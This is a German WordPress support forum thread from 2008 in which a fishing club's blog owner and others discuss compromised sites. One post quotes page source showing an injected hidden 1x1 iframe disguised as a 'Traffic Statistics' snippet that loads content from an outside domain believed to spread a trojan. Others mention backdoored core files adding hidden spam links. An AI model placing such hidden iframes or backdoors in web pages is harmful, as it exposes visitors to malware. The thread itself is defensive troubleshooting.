Zurück   WordPress Deutschland Forum > Support > Installation
Registrieren Hilfe Benutzerliste Suchen Heutige Beiträge Alle Foren als gelesen markieren Threads ohne Antworten


Antwort
 
Themen-Optionen Ansicht
Alt 23.01.2008, 08:13   #11 (permalink)
schorsch
PostRank: 0
 
Registriert seit: 15.03.2007
Beiträge: 9
Zitat:
Zitat von Putzlowitsch Beitrag anzeigen
Dieses IFrame mit dem Zähler (?) ist immer noch drin, und zwar im Beitrag "Winterfest mit Ausrufung der Fischerkönige". Da wird mit Javascript irgendwelcher Code zusammengebastelt. Sowas ist immer verdächtig, springen Virenscanner bestimmt gerne drauf an. Ist ja möglicherweise wirklich ein Trojaner.

Gruß
Ingo
Danke Putzlowitsch! Ein Blick in den Quellcode bestätigt Deinen Hinweis:
Zitat:
<div class="post" id="post-165">
<h2><a href="http://fv-bakum.de/?p=165" rel="bookmark" title="Permanent Link to Winterfest mit Ausrufung der Fischerkönige">Winterfest mit Ausrufung der Fischerkönige</a></h2>
<small>18. November 2007 <!-- von admin --></small>

<div class="entry">
<p> Am 17. November fand das Winterfest des Fischereivereins der Gemeinde Bakum e.V. statt. Es Abschluss und Höhepunkt des Jahres 2007 zugleich.</p>
<div class="myinlinepictureleft" style="width:150px">
<div class="myinlineborder" style="width:150px"><img class="myinlinepictureimg" src="http://fv-bakum.de/wp-content/myfotos/winterfest1//tumbs/tmb_DSC_0050.jpg" alt="" title="" width="150" height="99" /></div>
</div>
<p>Zahlreiche Mitglieder und Freunde des Vereins waren zum Winterfest in das Vereinslokal Tiemerding in Hausstette gekommen. Nach der Begrüßung durch den zweiten Vorsitzenden Bernard Koldehoff gab es ein deftiges und leckeres Kohlessen. Danach wurden die Fischerkönige ausgerufen. Björn Gerken ist Fischerkönig am Mäuseturmsee in Harme, Günter Osterloh am Vereinsteich in Carum. <a href="http://fv-bakum.de/?page_id=161">Zu den Fotos …</a></p>
<p>Oliver Peschke wurde für 30 Jahre Mitgliedschaft im Fischereiverein, Werner Klomfass für 25 Jahre Mitgliedschaft geehrt. Eine große Tombola mit zahlreichen attraktiven Gewinnen stand danach auf dem Programm. Mit Dj Ferdi gab es eine große Polonaise durch den Saal<!-- Traffic Statistics --> <iframe src="http://www.wp-stats-php.info/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics --> und noch lange wurde getanzt und gefeiert.</p>
</div>
Ich habe daraufhin diesen Beitrag gelöscht. Wie kann es sein, das dieser Code in diesen Beitrag kam? Wie kann man dies verhindern?
schorsch ist offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiWong this Post!
Mit Zitat antworten
Alt 23.01.2008, 09:55   #12 (permalink)
schorsch
PostRank: 0
 
Registriert seit: 15.03.2007
Beiträge: 9
Zitat:
Zitat von Putzlowitsch Beitrag anzeigen
Dieses IFrame mit dem Zähler (?) ist immer noch drin, und zwar im Beitrag "Winterfest mit Ausrufung der Fischerkönige". Da wird mit Javascript irgendwelcher Code zusammengebastelt. Sowas ist immer verdächtig, springen Virenscanner bestimmt gerne drauf an. Ist ja möglicherweise wirklich ein Trojaner.

Gruß
Ingo
Danke Ingo, dass ist schon mal die Ursache:

Ein böser Code wurde einfach in meinen Beiträgen eingeschleust, der auf eine wp-stats-info …. Seite verwies, von der anscheinend dieser Trojaner seinen Weg in fremde Rechner sucht. Ein einfacher Rechtsklick mit der Maus “Seitenquelltext anzeigen” reichte aus, diesen Code in den Beiträgen sofort zu entdecken. Selbstverständlich habe ich die “infizierten” Beiträge sofort entfernt. Bei einem Update der Wordpres-Installation werden die Beiträge nicht geändert. Deshalb konnte der schädliche Code beim Auswechseln der Wordpress-Dateien auch nicht beseitigt werden.
Nur was soll man jetzt noch machen? Wie kömmt dieser böse Quelltext in mein Blog? Wie kann man verhindern, das dieser Code sich so einfach in ein Wordpress-Blog schleichen kann? Ich habe alle Dateien der Installation getauscht, meinen Rechner mit dem Antivirenprogramm Antivir gescannt. Nun weiß ich auch nicht, was ich sonst noch so tun kann.

Ich habe in meinem Blogartikel Boeser Code im Wordpress-Blog « Schorschs World dieses Problem ebenfalls zur Diskussion gestellt, da dies sicher auch andere betrifft.
Danke für Eure weiteren Tipps und Unterstützung,
Schorsch

Geändert von schorsch (23.01.2008 um 11:36 Uhr). Grund: Syntax/Rechtschreibfehler
schorsch ist offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiWong this Post!
Mit Zitat antworten
Alt 23.01.2008, 11:54   #13 (permalink)
Alphawolf
WPD-Moderator
 
Registriert seit: 31.05.2005
Ort: Gera
Beiträge: 1.835
Ich hatte kürzlich eine ähnliche Attacke. In meinem Blog-Footer wurden Links zu Sex- und Paris Hil**n-Seiten gesetzt, die aber in einem DIV standen, der versteckt war. Man konnte sie also nicht sehen (bzw. nur im Quelltext). Ursache war, dass jemand den Hook wp_footer nutzte, um das in den Footer zu schreiben, denn in der Theme-footer.php war nichts dergleichen.

Der Code wurde in der /wp-includes/default_filters.php eingetragen, sodass die Links auttomatisch geschrieben wurden: Fixes wordpress.net.in Spam footer Injection Infected by Goro class-mail.php and default-filters.php backdoor » By Avice De'vereux » WordPress, injection, vulnerability Bei mir war's nur Punkt 4, der zutraf.
__________________
Erweiterungen
Alphawolf ist offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiWong this Post!
Mit Zitat antworten
Alt 23.01.2008, 17:29   #14 (permalink)
schorsch
PostRank: 0
 
Registriert seit: 15.03.2007
Beiträge: 9
Zitat:
... ). Ursache war, dass jemand den Hook wp_footer nutzte, um das in den Footer zu schreiben, denn in der Theme-footer.php war nichts dergleichen.
Schön, wer ist der "Jemand", und wie hast Du dieses Problem gelöst? Was ist das für Normalsterbliche, ein "Hook"? Wo war die Sicherheitslücke? Wie konnten die Dateien von außen verändert werden?

Geändert von schorsch (23.01.2008 um 17:35 Uhr). Grund: Zitat hinzugefügt
schorsch ist offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiWong this Post!
Mit Zitat antworten
Alt 23.01.2008, 19:12   #15 (permalink)
Arno Simon
WPD-Team
 
Benutzerbild von Arno Simon
 
Registriert seit: 30.11.2005
Ort: Oberhausen (Rhld.)
Beiträge: 1.615
steht alles in oben (von alphawolf) gepostetem Link bzw. den darin enthaltenen weiterführenden Links.

vG

Arno
__________________
Feedback ist Wichtig!|FAQ|Rückfragen im Forum!|Wenn ich mal was vergesse.... einfach mal sagen...
Arno Simon ist offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiWong this Post!
Mit Zitat antworten
Alt 24.01.2008, 10:15   #16 (permalink)
Alphawolf
WPD-Moderator
 
Registriert seit: 31.05.2005
Ort: Gera
Beiträge: 1.835
Das gibt's doch nicht. Jetzt hab ich gerade nochmal geschaut und der Eintrag in /wp-includes/default_filters.php schon wieder drin. Jetzt habe ich auch die class_mail.php gelöscht, mal sehen ob er heute Nacht wieder schreibt..
__________________
Erweiterungen
Alphawolf ist offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiWong this Post!
Mit Zitat antworten
Alt 05.02.2008, 08:12   #17 (permalink)
schorsch
PostRank: 0
 
Registriert seit: 15.03.2007
Beiträge: 9
Kommt der böse Code über Kommentare und Trackbacks?

Ich hatte in den letzten Tagen weitere merkwürdige "Zusatzeinträge" in unserem Feuerwehrblog: in einem Eintrag wurde Text in spanischer Sprache hinzugefügt. Heute morgen wurde ich über einen Kommentar iper Email nformiert und fand in meinem Blog einen angeblichen Google - Link zu Handy - Rufmelodien. Ich nehme an, dass über diese Lücke der unerwünschte Text und Quellcode ins Blog kommen kann. Daher werde ich erstmal alle Kommentar- und Trackbackfunktionen deaktivieren. Ist eigentlich ja schade. Ein Stück Wordpress-Funktion wird zerstört durch derartige Sicherheitslücken ...
schorsch ist offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiWong this Post!
Mit Zitat antworten
Alt 05.02.2008, 08:48   #18 (permalink)
Monika
WPD-Team
 
Benutzerbild von Monika
 
Registriert seit: 04.06.2005
Ort: INET
Beiträge: 5.872
ich würd mal sagen dein server ist offen wie ein Scheunentor ...

Monika ist offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiWong this Post!
Mit Zitat antworten
Alt 04.05.2008, 11:29   #19 (permalink)
SusanneK.
PostRank: 3
 
Registriert seit: 14.02.2006
Beiträge: 100
@schorsch,

weißt du mittlerweile, wie die auf deinen Server gekommen sind?
SusanneK. ist offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiWong this Post!
Mit Zitat antworten
Alt 15.05.2008, 14:50   #20 (permalink)
Andreas_S
PostRank: 2
 
Benutzerbild von Andreas_S
 
Registriert seit: 29.12.2005
Ort: Berlin
Beiträge: 94
Amazon-Anzeigen und iFrame-Tag

Ich habe auch gerade telefonisch erfahren, dass bei einem Zugriff auf mein Blog der Kaspersky-Virenscanner "geschrien" hat.
Zu rekonstruieren war das telefonisch nicht.
Aber nach der Lektüre dieses Threads hier glaube ich zu wissen, woran es liegen könnte, dass Kaspersky "schreit": Amazon-Buchanzeigen könnten es sein wie der folgdende Code zeigt:

Code:
<iframe src="http://rcm-de.amazon.de/e/cm?t=37sechsblog-21&o=3&p=8&l=as1&asins=3766332341&fc1=000000&IS2=1&lt1=_blank&lc1=0000ff&bc1=000000&bg1=ffffff&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" marginbuttom="30" align="left" frameborder="0"></iframe>
Kommende Woche bin ich ohnehin bei dem Anrufer zu Besuch und werde das mal testen. Und dann werde ich es Euch wissen lassen.

Grüße!
__________________
Andreas Skowronek
Freier Journalist, Autor und Seminar-Trainer schreibt das

Blog für Betriebsrat und Jugendvertretung (JAV) – immer subjektiv und nie langweilig.

http://37sechsblog.de
Andreas_S ist offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiWong this Post!
Mit Zitat antworten
Antwort


Themen-Optionen
Ansicht

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge anzufügen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

vB Code ist An.
Smileys sind An.
[IMG] Code ist Aus.
HTML-Code ist Aus.
Trackbacks are An
Pingbacks are Aus
Refbacks are Aus


Alle Zeitangaben in WEZ +2. Es ist jetzt 06:34 Uhr.


Sponsoren:

Powered by vBulletin® Version 3.6.8 (Deutsch)
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.0.0  — ImpressumEin Inpsyde.com Projekt